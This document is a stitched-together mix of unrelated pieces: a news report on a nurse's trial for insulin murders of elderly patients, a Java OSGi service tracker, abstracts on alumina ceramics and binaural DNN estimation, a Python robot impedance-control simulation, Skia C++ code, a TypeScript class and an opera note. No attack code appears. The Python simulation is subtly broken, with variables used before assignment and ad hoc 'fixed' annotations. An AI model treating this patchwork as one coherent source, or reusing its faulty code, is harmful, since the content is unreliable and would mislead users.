The body of an 88-year-old woman allegedly murdered by a hospital nurse was exhumed more than a year after her death, a court has heard. Doctors at first diagnosed a stroke in the case of Bridget Bourke, of Leeds, Newcastle Crown Court heard. Colin Norris, of Egilsay Terrace, Glasgow, is charged with murdering four elderly patients, including Mrs Bourke, at two Leeds hospitals. Mr Norris denies the offences, which allegedly occurred in 2002. He has also pleaded not guilty to the attempted murder of the same four women and the attempted murder of 90-year-old Vera Wilby in the same year. The court heard on Wednesday how police investigating the death of Ethel Hall, 86, from Calverley in Leeds in December 2002, decided to review the cases of Mrs Bourke; Doris Ludlam, 80, from Pudsey; and Irene Crookes, 79, from Leeds. All three women had died earlier that year. The jury heard the women's bodies contained large amounts of insulin, which caused them to slip into comas from which they could not be revived. Robert Smith QC, prosecuting, said: "Mrs Bourke, unlike Doris Ludlam and Irene Crookes, had been buried, not cremated. "Following the investigation into the death of Ethel Hall, an order was obtained from the coroner for the exhumation of Mrs Bourke's body." Mr Smith said that although Mrs Bourke had been a "frail and sick" woman with well-established diseases, tests carried out by two experts following the exhumation found she did not die from her original illnesses. Following the exhumation in September 2003, a pathologist redefined her cause of death as an insulin-induced coma, he told the jury. The prosecutor said that when another of Mr Norris' alleged victims, Mrs Crookes, was found slumped in bed, a member of staff noticed in the nurse, Mr Norris, "an attitude of detached amusement". The medical practitioner said Mr Norris showed no urgency in trying to help revive her, Mr Smith told the court.
/*
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
 * implied.
 *
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.ops4j.pax.web.extender.war.internal.tracker;

import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

import org.osgi.framework.BundleContext;
import org.osgi.framework.ServiceReference;
import org.osgi.util.tracker.ServiceTracker;
import org.osgi.util.tracker.ServiceTrackerCustomizer;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

/**
 * Tracks a service and rebinds to the highest-ranked registration as
 * instances come and go.
 */
public class ReplaceableService<T> {

    /**
     * Logger.
     */
    private static final Logger LOG = LoggerFactory.getLogger(ReplaceableService.class);

    /**
     * Bundle context. Constructor parameter. Cannot be null.
     */
    private final BundleContext bundleContext;

    /**
     * Service class. Constructor parameter. Cannot be null.
     */
    @SuppressWarnings("unused")
    private final Class<T> serviceClass;

    /**
     * Listener for backing service related events. Constructor parameter. Can be null.
     */
    private final ReplaceableServiceListener<T> serviceListener;

    /**
     * Service tracker. Cannot be null.
     */
    private final ServiceTracker<T, T> serviceTracker;

    private final List<ServiceReference<T>> boundReferences;

    private T service;

    public ReplaceableService(BundleContext context, Class<T> serviceClass,
            ReplaceableServiceListener<T> serviceListener) {
        this.bundleContext = context;
        this.serviceClass = serviceClass;
        this.serviceListener = serviceListener;
        this.serviceTracker = new ServiceTracker<>(context, serviceClass, new Customizer());
        this.boundReferences = new ArrayList<>();
    }

    public void start() {
        this.serviceTracker.open();
    }

    public void stop() {
        this.serviceTracker.close();
    }

    protected void bind(T serviceToBind) {
        if (serviceListener != null) {
            T oldService;
            synchronized (this) {
                oldService = service;
                service = serviceToBind;
            }
            serviceListener.serviceChanged(oldService, serviceToBind);
        }
    }

    private class Customizer implements ServiceTrackerCustomizer<T, T> {

        @Override
        public T addingService(ServiceReference<T> reference) {
            T bundleService = bundleContext.getService(reference);
            ServiceReference<T> bind;
            synchronized (boundReferences) {
                boundReferences.add(reference);
                Collections.sort(boundReferences);
                bind = boundReferences.get(0);
            }
            if (bind == reference) {
                bind(bundleService);
            } else {
                bind(serviceTracker.getService(bind));
            }
            return bundleService;
        }

        @Override
        public void modifiedService(ServiceReference<T> reference, T modifiedService) {
        }

        @Override
        public void removedService(ServiceReference<T> reference, T removedService) {
            ServiceReference<T> bind;
            synchronized (boundReferences) {
                boundReferences.remove(reference);
                if (boundReferences.isEmpty()) {
                    bind = null;
                } else {
                    bind = boundReferences.get(0);
                }
            }
            if (bind == null) {
                bind(null);
            } else {
                bind(serviceTracker.getService(bind));
            }
            bundleContext.ungetService(reference);
        }
    }
}
Microstructures and electrical properties of TiO2-doped Al2O3 ceramics. Microstructures of TiO2-doped alpha-Al2O3 ceramics used as electrostatic chucks (ESCs) were investigated by transmission electron microscopy, including energy-dispersive spectrometry (EDS) and electron energy loss spectroscopy (EELS) analyses, in connection with their electrical properties. The lattice parameters of the sintered Al2O3 grains are almost independent of TiO2 content as well as of sintering temperature, indicating immiscibility of the additive with Al2O3. Scanning transmission electron microscopy (STEM)-EDS revealed that the grain boundaries of alpha-Al2O3 are slightly enriched with Ti. EELS showed that the segregated Ti is in a partially reduced state. The Ti-enriched grain boundaries therefore act as a conductive network, which is responsible for the considerable improvement of electronic conductivity with TiO2 doping. STEM-EDS and electron diffraction analyses confirmed that micrometre-sized TiO2 particles are dispersed in the alpha-Al2O3 when sintering is performed at 1300 degrees C or lower, while the particles transform into Al2TiO5 at higher temperatures. EELS revealed that the TiO2 grains are partially reduced into non-stoichiometric TiO(2-y), while the Al2TiO5 grains are in a fully oxidized state. The TiO(2-y)-dispersed alpha-Al2O3 shows no dielectric relaxation and quite smooth dissipation of the electrostatically condensed charges. In contrast, alpha-Al2O3 with Al2TiO5 grains exhibits pronounced dielectric relaxation, and the electrostatic dissipation takes as long as 30 s. The former is therefore preferable for ESC applications in terms of quick response.
Joint estimation of binaural distance and azimuth by exploiting deep neural networks. State-of-the-art supervised binaural distance estimation methods often use binaural features that are related to both distance and azimuth, so distance estimation accuracy may degrade considerably when the azimuth fluctuates. To incorporate the azimuth when estimating the distance, this paper proposes a supervised method that jointly estimates the azimuth and the distance of binaural signals based on deep neural networks (DNNs). In this method, subband binaural features, including statistical properties of several subband binaural cues and the standard deviation of the binaural spectral magnitude difference, are extracted together as cues for jointly estimating the azimuth and the distance within a multi-objective DNN framework. In particular, both the azimuth and the distance cues are used during error back-propagation in the multi-objective DNN framework, which improves the generalization ability of both the azimuth and the distance estimates. Experimental results demonstrate that the proposed method not only achieves high azimuth estimation accuracy but also effectively improves distance estimation accuracy when compared with several state-of-the-art supervised binaural distance estimation methods.
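The paper's exact network is not reproduced here, but a multi-objective DNN of this kind is straightforward to sketch: a shared trunk over the subband binaural feature vector feeds two output heads, one for azimuth and one for distance, and both losses are back-propagated together through the shared layers. The layer sizes, class counts, and the use of PyTorch below are illustrative assumptions, not details taken from the paper.

import torch
import torch.nn as nn

class JointAzimuthDistanceDNN(nn.Module):
    """Shared trunk with two heads; both losses train the shared layers."""
    def __init__(self, n_features=128, n_azimuths=37, n_distances=8):
        super().__init__()
        self.trunk = nn.Sequential(
            nn.Linear(n_features, 256), nn.ReLU(),
            nn.Linear(256, 256), nn.ReLU(),
        )
        self.azimuth_head = nn.Linear(256, n_azimuths)
        self.distance_head = nn.Linear(256, n_distances)

    def forward(self, x):
        h = self.trunk(x)
        return self.azimuth_head(h), self.distance_head(h)

model = JointAzimuthDistanceDNN()
criterion = nn.CrossEntropyLoss()
x = torch.randn(16, 128)            # a batch of subband feature vectors
az_t = torch.randint(0, 37, (16,))  # azimuth class labels
di_t = torch.randint(0, 8, (16,))   # distance class labels
az_logits, di_logits = model(x)
loss = criterion(az_logits, az_t) + criterion(di_logits, di_t)  # joint objective
loss.backward()  # gradients from both tasks reach the shared trunk

Because the summed loss sends gradients from both tasks through the shared trunk, the distance head benefits from azimuth supervision, which is the generalization effect the abstract describes.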
# scripts/simulation.py
from robot3 import *
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import quaternion
import scipy

mpl.style.use('seaborn')


class stateVector:
    def __init__(self):
        self.x = np.zeros(6)
        self.xd = np.zeros(6)
        self.xdd = np.zeros(6)
        self.quat = np.quaternion(1, 0, 0, 0)
        self.quat_d = np.quaternion(1, 0, 0, 0)
        self.quat_dd = np.quaternion(1, 0, 0, 0)
        self.x3 = self.x[:3]
        self.xd3 = self.xd[:3]    # fixed: original sliced self.x
        self.xdd3 = self.xdd[:3]  # fixed: original sliced self.x


class jointStateVector:
    def __init__(self, q, qd, qdd):
        self.q = q
        self.qd = qd
        self.qdd = qdd
        self.qnull = self.q
        self.qdnull = self.qd
        self.qddnull = self.qdd


class dataCollect:
    def __init__(self, sampcol):
        self.x = np.zeros((6, sampcol))
        self.xd = np.zeros((6, sampcol))
        self.q = np.zeros([7, 1])
        self.qd = np.zeros([7, 1])
        self.qdd = np.zeros([7, 1])
        self.aq = np.zeros((7, sampcol))
        self.error = np.zeros((6, sampcol))
        self.imp = np.zeros((6, sampcol))
        self.F = np.zeros((7, sampcol))
        self.tau = np.zeros((7, sampcol))


class simulation:
    def __init__(self, state_des, state_end, jointState, error, data):
        self.state_des = state_des
        self.state_end = state_end
        self.jointState = jointState
        self.error = error
        self.data = data
        self.Bn = np.zeros((7, 7))
        self.Kn = np.zeros((7, 7))

    def spong_impedance_control(self, impctrl, rb):
        # Double integrator impedance control strategy
        kine = rb.forwardKinematics(self.jointState.q)
        rot = kine.R
        # rot2 = quaternion.from_rotation_matrix(self.state_des.quat)
        # R_e = block_diag(rot, rot)
        # xdd_in = np.dot(R_e.T, self.state_des.xdd)
        # E = rb.quatprop_E(self.error.quat)
        Ko = rot.dot(impctrl.Kd[3:, 3:])
        Kd_b = block_diag(impctrl.Kd[:3, :3], Ko)
        # Kd_b = impctrl.Kd
        Bd = impctrl.damping_constant_mass()
        # impctrl.Kd[3:, 3:] = Ko
        # impctrl.Bd = impctrl.damping_constant_mass()
        # Kd_b = impctrl.Kd
        ax = impctrl.outputquat(Kd_b, Bd, self.error.x, self.error.xd,
                                self.state_des.xdd, impctrl.F)
        # self.data.imp[:3, i] = ax
        aq_in = rb.calcQddNull(ax, self.jointState.q, self.jointState.qd,
                               self.jointState.qddnull)

        # Inverse dynamics
        tauc = rb.inverseDynamics(self.jointState.q, self.jointState.qd,
                                  aq_in, rb.grav)

        # Computing Jacobian for external forces:
        J = rb.calcJac(self.jointState.q)
        Jpinv = rb.pinv(J)

        # Nullspace torque (projection matrix * torque_0)
        tau_nullspace = np.dot(
            (np.eye(7) - np.dot(J.T, Jpinv.T)),
            (np.dot(impctrl.nullspace_stiffness_,
                    (self.jointState.qnull - self.jointState.q)) -
             np.dot(np.dot(2, np.sqrt(impctrl.nullspace_stiffness_)),
                    self.jointState.qd)))

        # q_null update
        self.jointState.q_null = self.jointState.q

        # Torque collected
        tau = tauc + tau_nullspace
        return tau

    def classical_impedance_control(self, impctrl, rb, ndof, *args):
        # Frame Selection
        kine = rb.forwardKinematics(self.jointState.q)
        rot = kine.R
        R_e = block_diag(rot, rot)

        # Frame variables
        vd_error = rb.calcVd(self.jointState.q, self.jointState.qd,
                             self.state_des.xd)
        xdd_in = R_e.dot(self.state_des.xdd)
        xd_end = R_e.dot(self.state_end.xd)

        if args:
            rb.ndof = 7
            if args[0].lower() in ['rpy']:
                J = rb.calcJac(qin)
                Ja = rb.analyticJacobian(J, self.state_end.x[3:], 'rpy')
                # Fix for jacobian dot later
            if args[0].lower() in ['quaternion']:
                J = rb.calcJac(self.jointState.q)
                Jd = rb.calcJacDot(self.jointState.q, self.jointState.qd)
                # Ja = J
                Ja = R_e.dot(J)
                Jad = R_e.dot(Jd)
                # Ja = rb.analyticJacobian(J, self.state_end.quat, 'quaternion6')
                # Jad = rb.analyticJacobianDot(J, Jd, self.state_end.quat, self.state_end.quat_d)

        # Cartesian Inertia Matrix
        # M = rb.inertiaComp(self.jointState.q)
        Lambda = rb.cinertiaComp(self.jointState.q, Ja)
        # print(Lambda.shape)

        # Cartesian Coriolis Matrix
        mu = rb.ccoriolisComp(self.jointState.q, self.jointState.qd, Ja, Jad)

        # For the classical impedance controller without redundancy
        if ndof == 6:
            qin = np.zeros(6)
            qdin = np.zeros(6)
            qin[0] = self.jointState.q[0]
            qin[1] = self.jointState.q[2]
            qin[2] = self.jointState.q[3]
            qin[3] = self.jointState.q[4]
            qin[4] = self.jointState.q[5]
            qin[5] = self.jointState.q[6]
            qdin[0] = self.jointState.qd[0]
            qdin[1] = self.jointState.qd[2]
            qdin[2] = self.jointState.qd[3]
            qdin[3] = self.jointState.qd[4]
            qdin[4] = self.jointState.qd[5]
            qdin[5] = self.jointState.qd[6]
            Ja = np.delete(Ja, 1, 1)
            Jad = np.delete(Jad, 1, 1)
            # Lambda = np.delete(Lambda, 1, 1)
            # mu = np.delete(Lambda, 1, 1)
            # rb.ndof = 6
        # else:
        #     qin = self.jointState.q
        #     qdin = self.jointState.qd
        rb.ndof = 7

        # Jointspace Coriolis Matrix
        # C = rb.coriolisComp(self.jointState.q, self.jointState.qd)

        # Jointspace gravitational load vector
        tg = rb.gravloadComp(self.jointState.q, rb.grav)

        # Computing Jacobian:
        # Jnull = rb.calcJac(self.jointState.q)
        Jpinv = rb.pinv(Ja)

        # Computing dynamic damping
        E = rb.quatprop_E(self.error.quat)
        Ko = 2 * E.T.dot(rot.dot(impctrl.Kd[3:, 3:]))
        Bd = impctrl.Bd
        # Bd = impctrl.damping_constant_mass()
        # impctrl.Kd[3:, 3:] = Ko

        # u, s, vh = np.linalg.svd(M.T, full_matrices=True)
        # u.shape, s.shape, vh.shape
        # rho = 0.2
        # S2 = np.dot(M.T, 0)
        # for i in range(len(s)):
        #     S2[i, i] = s[i] / (s[i]**2 + rho**2)
        # MpinvT = np.dot(np.dot(vh.T, S2.T), u.T)
        # MpinvT = MpinvT.T
        # impctrl.zeta = np.array([1, 1, 1, 1, 1, 1])
        #
        # # Dual eigen:
        # Bd, Kd_b3 = impctrl.damping_dual_eigen(impctrl.Kd, impctrl.Md)

        # Test
        # Kd_b = impctrl.Kd

        # Quaternion stiffness and translational stiffness
        Kd_b = block_diag(impctrl.Kd[:3, :3], Ko)

        # Compute torque "cartesian"
        # tauc = (np.dot(Ja.T, (Lambda.dot(self.state_des.xdd) + mu.dot(self.state_end.xd))) -
        #         np.dot(Ja.T, np.dot(np.dot(Lambda, np.linalg.inv(impctrl.Md)),
        #                             (np.dot(Kd_b, self.error.x) + np.dot(Bd, self.error.xd)))))
        tauc = (np.dot(Ja.T, (Lambda.dot(xdd_in) + mu.dot(xd_end))) -
                np.dot(Ja.T, np.dot(np.dot(Lambda, np.linalg.inv(impctrl.Md)),
                                    (np.dot(Kd_b, self.error.x) +
                                     np.dot(Bd, vd_error)))) +
                np.dot(Ja.T.dot(Lambda.dot(np.linalg.inv(impctrl.Md)) - np.eye(6)),
                       impctrl.F))

        # Append to torque if ndof 6 sim
        if ndof == 6:
            # At the beginning
            tauc = np.array([tauc[0], 0, tauc[1], tauc[2], tauc[3], tauc[4], tauc[5]])

        # Dual eigen:
        # ns = impctrl.nullspace_stiffness_
        # K_n = np.diag(np.array([ns, ns, ns, ns, ns, ns, ns]))
        # B_n, Kd_b2 = impctrl.damping_dual_eigen2(K_n, M)

        # Compute torque nullspace
        # tau_nullspace = np.dot((np.eye(7) - np.dot(Jnull.T, Jpinv.T)),
        #                        (np.dot(K_n, (self.jointState.qnull - self.jointState.q)) -
        #                         np.dot(B_n, self.jointState.qd)))
        # Jpinv2 = np.dot(Lambda, J.dot(MpinvT))
        tau_nullspace = np.dot(
            (np.eye(7) - np.dot(Ja.T, Jpinv.T)),
            (np.dot(self.Kn, (self.jointState.qnull - self.jointState.q)) -
             np.dot(self.Bn, self.jointState.qd)))

        # tau = tauc + tau_nullspace + tg + np.dot(C, self.jointState.qd)
        tau = tauc + tau_nullspace + tg
        return tau

    def inertia_avoidance_impedance_control(self, impctrl, rb, ndof, *args):
        # For the classical impedance controller without redundancy
        if ndof == 6:
            qin = self.jointState.q[:6]
            qdin = self.jointState.qd[:6]
            rb.ndof = 6
        else:
            qin = self.jointState.q
            qdin = self.jointState.qd

        # Computing analytical Jacobian
        if args:
            if args[0].lower() in ['rpy']:
                J = rb.calcJac(qin)
                Ja = rb.analyticJacobian(J, self.state_end.x[3:], 'rpy')
            if args[0].lower() in ['quaternion']:
                J = rb.calcJac(qin)
                Ja = rb.analyticJacobian(J, self.state_end.quat, 'quaternion6')

        # Cartesian Inertia Matrix
        M = rb.inertiaComp(qin)
        Lambda = rb.cinertiaComp(qin, Ja)

        # Cartesian Coriolis Matrix
        # NOTE: Jad was referenced here but never computed in the original
        # source; computing it as in classical_impedance_control is assumed.
        Jd = rb.calcJacDot(qin, qdin)
        Jad = rb.analyticJacobianDot(J, Jd, self.state_end.quat,
                                     self.state_end.quat_d)
        mu = rb.ccoriolisComp(qin, qdin, Ja, Jad)

        # Reset DoF
        rb.ndof = 7

        # Jointspace Coriolis Matrix
        # C = rb.coriolisComp(self.jointState.q, self.jointState.qd)

        # Jointspace gravitational load vector
        tg = rb.gravloadComp(self.jointState.q, rb.grav)

        # Computing Jacobian:
        Jnull = rb.calcJac(self.jointState.q)
        Jpinv = rb.pinv(Jnull)

        # Computing dynamic damping
        impctrl.zeta = np.array([1, 1, 1, 1, 1, 1])

        # Dual eigen:
        Bd, Kd_b = impctrl.damping_dual_eigen(impctrl.Kd, Lambda)

        # Test
        Kd_b = impctrl.Kd

        # Compute torque "cartesian"
        # NOTE: tg is added both here and in tau below, as in the original.
        tauc = tg + np.dot(Ja.T, (np.dot(Lambda, self.state_des.xdd) +
                                  mu.dot(self.state_des.xd) -
                                  np.dot(Kd_b, self.error.x) -  # fixed: was Kd_B
                                  np.dot(Bd, self.error.xd)))

        # Append to torque if ndof 6 sim
        if ndof == 6:
            # At the beginning
            tauc = np.append(0, tauc)
            # insert
            # tauc = np.hstack((a[0:4], np.zeros(12), a[4:]))

        # Compute torque nullspace
        tau_nullspace = np.dot(
            (np.eye(7) - np.dot(Jnull.T, Jpinv.T)),
            (np.dot(self.Kn, (self.jointState.qnull - self.jointState.q)) -
             np.dot(self.Bn, self.jointState.qd)))

        tau = tauc + tau_nullspace + tg
        return tau

    def impedance_control_equilibrium(self, impctrl, rb, ndof, *args):
        # For the classical impedance controller without redundancy
        if args:
            rb.ndof = 7
            if args[0].lower() in ['rpy']:
                J = rb.calcJac(qin)
                Ja = rb.analyticJacobian(J, self.state_end.x[3:], 'rpy')
                # Fix for jacobian dot later
            if args[0].lower() in ['quaternion']:
                J = rb.calcJac(self.jointState.q)
                Jd = rb.calcJacDot(self.jointState.q, self.jointState.qd)
                Ja = rb.analyticJacobian(J, self.state_end.quat, 'quaternion6')
                Jad = rb.analyticJacobianDot(J, Jd, self.state_end.quat,
                                             self.state_end.quat_d)

        # For the classical impedance controller without redundancy
        if ndof == 6:
            qin = np.zeros(6)
            qdin = np.zeros(6)
            qin[0] = self.jointState.q[1]
            qin[1] = self.jointState.q[2]
            qin[2] = self.jointState.q[3]
            qin[3] = self.jointState.q[4]
            qin[4] = self.jointState.q[5]
            qin[5] = self.jointState.q[6]
            qdin[0] = self.jointState.qd[1]
            qdin[1] = self.jointState.qd[2]
            qdin[2] = self.jointState.qd[3]
            qdin[3] = self.jointState.qd[4]
            qdin[4] = self.jointState.qd[5]
            qdin[5] = self.jointState.qd[6]
            Ja = np.delete(Ja, 0, 1)
            Jad = np.delete(Jad, 0, 1)
            rb.ndof = 6
        else:
            qin = self.jointState.q
            qdin = self.jointState.qd

        # Reset DoF
        rb.ndof = 7

        # Cartesian Coriolis Matrix
        # mu = rb.ccoriolisComp()
        C = rb.coriolisComp(self.jointState.q, self.jointState.qd)

        # Jointspace gravitational load vector
        tg = rb.gravloadComp(self.jointState.q, rb.grav)

        # Computing Jacobian:
        Jnull = rb.calcJac(self.jointState.q)
        Jpinv = rb.pinv(Jnull)

        # Compute torque "cartesian"
        tauc = np.dot(J.T, (-np.dot(impctrl.cartesian_stiffness_, self.error.x) -
                            np.dot(impctrl.cartesian_damping_, self.error.xd)))

        # Append to torque if ndof 6 sim
        if ndof == 6:
            # At the beginning
            tauc = np.array([0, tauc[0], tauc[1], tauc[2], tauc[3], tauc[4], tauc[5]])

        # Compute torque nullspace
        tau_nullspace = np.dot(
            (np.eye(7) - np.dot(Jnull.T, Jpinv.T)),
            (np.dot(impctrl.nullspace_stiffness_,
                    (self.jointState.qnull - self.jointState.q)) -
             np.dot(np.dot(2, np.sqrt(impctrl.nullspace_stiffness_)),
                    self.jointState.qd)))

        tau = tauc + tau_nullspace + np.dot(C, self.jointState.qd) + tg
        return tau

    def outputEndeffector(self, rb, *args):
        kine = rb.forwardKinematics(self.jointState.q)
        Xftr = kine.transl
        if args:
            if args[0].lower() in ['rpy']:
                rpy = kine.rpy
                Xf = np.array([Xftr[0], Xftr[1], Xftr[2], rpy[0], rpy[1], rpy[2]])
                Xfd_calc = rb.calcXd(self.jointState.q, self.jointState.qd, 'rpy')
                Xfd = np.array([Xfd_calc[0], Xfd_calc[1], Xfd_calc[2],
                                Xfd_calc[3], Xfd_calc[4], Xfd_calc[5]])
            if args[0].lower() in ['quaternion']:
                rot = kine.R
                quatf = quaternion.from_rotation_matrix(rot)
                # quatf_float = rb.mat2quat(rot)
                # quatf = quaternion.from_float_array(quatf_float)
                Xf = np.array([Xftr[0], Xftr[1], Xftr[2],
                               quatf.x, quatf.y, quatf.z])
                Xfd_calc = rb.calcXd(self.jointState.q, self.jointState.qd)
                # quatf_d = quaternion.from_float_array(Xfd_calc[3:])
                Xfd = np.array([Xfd_calc[0], Xfd_calc[1], Xfd_calc[2],
                                Xfd_calc[3], Xfd_calc[4], Xfd_calc[5]])
                self.state_end.quat = quatf
                # self.state_end.quat_d = quatf_d
        self.state_end.x = Xf
        self.state_end.xd = Xfd

    def output_equilibrium_update(self, rb):
        kine = rb.forwardKinematics(self.jointState.q)
        Xftr = kine.transl
        rot = kine.R
        quatf = quaternion.from_rotation_matrix(rot)
        Xf = np.array([Xftr[0], Xftr[1], Xftr[2], quatf.x, quatf.y, quatf.z])
        self.state_end.quat = quatf
        self.state_end.x = Xf

    def quat_subtract(self, quat_des, quat_end):
        orientation_d = quaternion.as_float_array(quat_des)
        orientation = quaternion.as_float_array(quat_end)
        # Sign Ambiguity
        if orientation_d[1:].dot(orientation[1:]) < 0.0:
            quat_end.x = -orientation[1]
            quat_end.y = -orientation[2]
            quat_end.z = -orientation[3]
        eq = quat_end.inverse() * quat_des
        # An explicit eta/epsilon formulation of this difference is kept in
        # quat_subtract2 below.
        return eq

    def quat_subtract2(self, quat_des, quat_end):
        orientation_d = quaternion.as_float_array(quat_des)
        orientation = quaternion.as_float_array(quat_end)
        # Sign Ambiguity
        if orientation_d[1:].dot(orientation[1:]) < 0.0:
            quat_end.x = -orientation[1]
            quat_end.y = -orientation[2]
            quat_end.z = -orientation[3]
        eta_e = quat_end.w
        eps_e = np.array([quat_end.x, quat_end.y, quat_end.z])
        eta_d = quat_des.w
        eps_d = np.array([quat_des.x, quat_des.y, quat_des.z])
        eps_d_skew = np.array([[0, -eps_d[2], eps_d[1]],
                               [eps_d[2], 0, -eps_d[0]],
                               [-eps_d[1], eps_d[0], 0]])
        eq = (eta_d * eps_e) - (eta_e * eps_d) - eps_d_skew.dot(eps_e)
        return eq

    def feedbackError3(self, rb, *args):
        kine = rb.forwardKinematics(self.jointState.q, 'tool')
        rot = kine.R
        R_e = block_diag(rot, rot)
        if args:
            if args[0].lower() in ['rpy']:
                e = self.state_end.x - self.state_des.x
                e = rot.dot(e)
                ed = self.state_end.xd - self.state_des.xd
            if args[0].lower() in ['quaternion']:
                ep = self.state_end.x[:3] - self.state_des.x[:3]
                eq = self.quat_subtract(self.state_des.quat, self.state_end.quat)
                eqt = quaternion.as_float_array(eq)
                eqt = 2 * eqt[1:]
                # eqt = 2 * np.dot(rot, eqt)
                e = np.array([ep[0], ep[1], ep[2], eqt[0], eqt[1], eqt[2]])
                # e = np.dot(R_e, e)
                edp = (self.state_end.xd - self.state_des.xd)
                ed = np.array([edp[0], edp[1], edp[2], edp[3], edp[4], edp[5]])
                # ed = np.dot(R_e, e)
        self.error.x = e
        self.error.xd = ed
        self.error.quat = eq
        # self.error.quat_d = edq

    def feedback_equilibrium(self, rb):
        kine = rb.forwardKinematics(self.jointState.q)
        rot = kine.R
        ep = self.state_end.x[:3] - self.state_des.x[:3]
        ep = np.dot(rot, ep)
        eq = self.quat_subtract(self.state_des.quat, self.state_end.quat)
        eqt = quaternion.as_float_array(eq)
        eqt = eqt[1:]
        eqt = np.dot(rot, eqt)
        e = np.array([ep[0], ep[1], ep[2], eqt[0], eqt[1], eqt[2]])
        self.error.x = e

    def qIntegrate(self, qacc, dx):
        # Integrate from acceleration to velocity
        qdtemp = np.concatenate((self.data.qdd, qacc.reshape(7, 1)), axis=1)
        qd = np.trapz(qdtemp, axis=1) * dx

        # Integrate from velocity to position
        qtemp = np.concatenate((self.data.qd, qd.reshape(7, 1)), axis=1)
        q = np.trapz(qtemp, axis=1) * dx

        self.data.qdd = np.concatenate((self.data.qdd, qacc.reshape(7, 1)), axis=1)
        self.data.qd = np.concatenate((self.data.qd, qd.reshape(7, 1)), axis=1)
        self.data.q = np.concatenate((self.data.q, q.reshape(7, 1)), axis=1)

        self.jointState.q = q
        self.jointState.qd = qd
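For orientation, a driver loop for the classes above might look roughly like the following. This is a hypothetical sketch only: the robot model `robot`, the impedance-controller object `impctrl`, the time step, and the simplified forward-dynamics step (M*qdd = tau, ignoring Coriolis and gravity on the plant side) are assumptions for illustration and are not part of the original file.

# Hypothetical driver loop (illustrative assumptions throughout).
dt = 0.001
sim = simulation(stateVector(), stateVector(),
                 jointStateVector(np.zeros(7), np.zeros(7), np.zeros(7)),
                 stateVector(), dataCollect(1000))
for step in range(1000):
    sim.outputEndeffector(robot, 'quaternion')  # update end-effector state
    sim.feedbackError3(robot, 'quaternion')     # update Cartesian error
    tau = sim.classical_impedance_control(impctrl, robot, 7, 'quaternion')
    qdd = np.linalg.solve(robot.inertiaComp(sim.jointState.q), tau)
    sim.qIntegrate(qdd, dt)                     # torque -> qdd -> qd -> q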
/*
 * Copyright 2019 Google LLC
 *
 * Use of this source code is governed by a BSD-style license that can be
 * found in the LICENSE file.
 */

#include "src/gpu/GrTextureResolveRenderTask.h"

#include "src/gpu/GrGpu.h"
#include "src/gpu/GrMemoryPool.h"
#include "src/gpu/GrOpFlushState.h"
#include "src/gpu/GrRenderTarget.h"
#include "src/gpu/GrResourceAllocator.h"
#include "src/gpu/GrTexturePriv.h"

void GrTextureResolveRenderTask::init(const GrCaps& caps) {
    if (GrSurfaceProxy::ResolveFlags::kMSAA & fResolveFlags) {
        GrRenderTargetProxy* renderTargetProxy = fTarget->asRenderTargetProxy();
        SkASSERT(renderTargetProxy);
        SkASSERT(renderTargetProxy->isMSAADirty());
        renderTargetProxy->markMSAAResolved();
    }

    if (GrSurfaceProxy::ResolveFlags::kMipMaps & fResolveFlags) {
        GrTextureProxy* textureProxy = fTarget->asTextureProxy();
        SkASSERT(GrMipMapped::kYes == textureProxy->mipMapped());
        SkASSERT(textureProxy->mipMapsAreDirty());
        textureProxy->markMipMapsClean();
    }

    // Add the target as a dependency: We will read the existing contents of this texture while
    // generating mipmap levels and/or resolving MSAA.
    //
    // NOTE: This must be called before makeClosed.
    this->addDependency(fTarget.get(), GrMipMapped::kNo, GrTextureResolveManager(nullptr), caps);
    fTarget->setLastRenderTask(this);

    // We only resolve the texture; nobody should try to do anything else with this opsTask.
    this->makeClosed(caps);
}

void GrTextureResolveRenderTask::gatherProxyIntervals(GrResourceAllocator* alloc) const {
    // This renderTask doesn't have "normal" ops. In this case we still need to add an interval (so
    // fEndOfOpsTaskOpIndices will remain in sync), so we create a fake op# to capture the fact that
    // we manipulate fTarget.
    alloc->addInterval(fTarget.get(), alloc->curOp(), alloc->curOp(),
                       GrResourceAllocator::ActualUse::kYes);
    alloc->incOps();
}

bool GrTextureResolveRenderTask::onExecute(GrOpFlushState* flushState) {
    // Resolve msaa before regenerating mipmaps.
    if (GrSurfaceProxy::ResolveFlags::kMSAA & fResolveFlags) {
        GrRenderTarget* renderTarget = fTarget->peekRenderTarget();
        SkASSERT(renderTarget);
        if (renderTarget->needsResolve()) {
            flushState->gpu()->resolveRenderTarget(renderTarget);
        }
    }

    if (GrSurfaceProxy::ResolveFlags::kMipMaps & fResolveFlags) {
        GrTexture* texture = fTarget->peekTexture();
        SkASSERT(texture);
        if (texture->texturePriv().mipMapsAreDirty()) {
            flushState->gpu()->regenerateMipMapLevels(texture);
        }
    }

    return true;
}
/**
 * Created by F1 on 2017/6/1.
 */
export class TMenu {
    id: number;
    code: string;
    title: string;
    parentId: number;
    href: string;
    icon: string;
    orderNum: string;
    path: string;
    enabled: string = "Y";
    createTime: string;
    updateTime: string;
}
La Commedia

Performance history
Following its Amsterdam premiere, La Commedia was performed in 2010 in concert version, but with the same cast and musicians, at the Disney Concert Hall in Los Angeles and Carnegie Hall in New York. It received a further concert performance in London at the Barbican in 2016, performed by the BBC Symphony Orchestra with Cristina Zavalloni and Claron McFadden reprising their original roles as Dante and Beatrice. The opera won the 2011 Grawemeyer Award for Music Composition, and in 2014 the recording of the premiere production was released on CD and DVD.

Reception
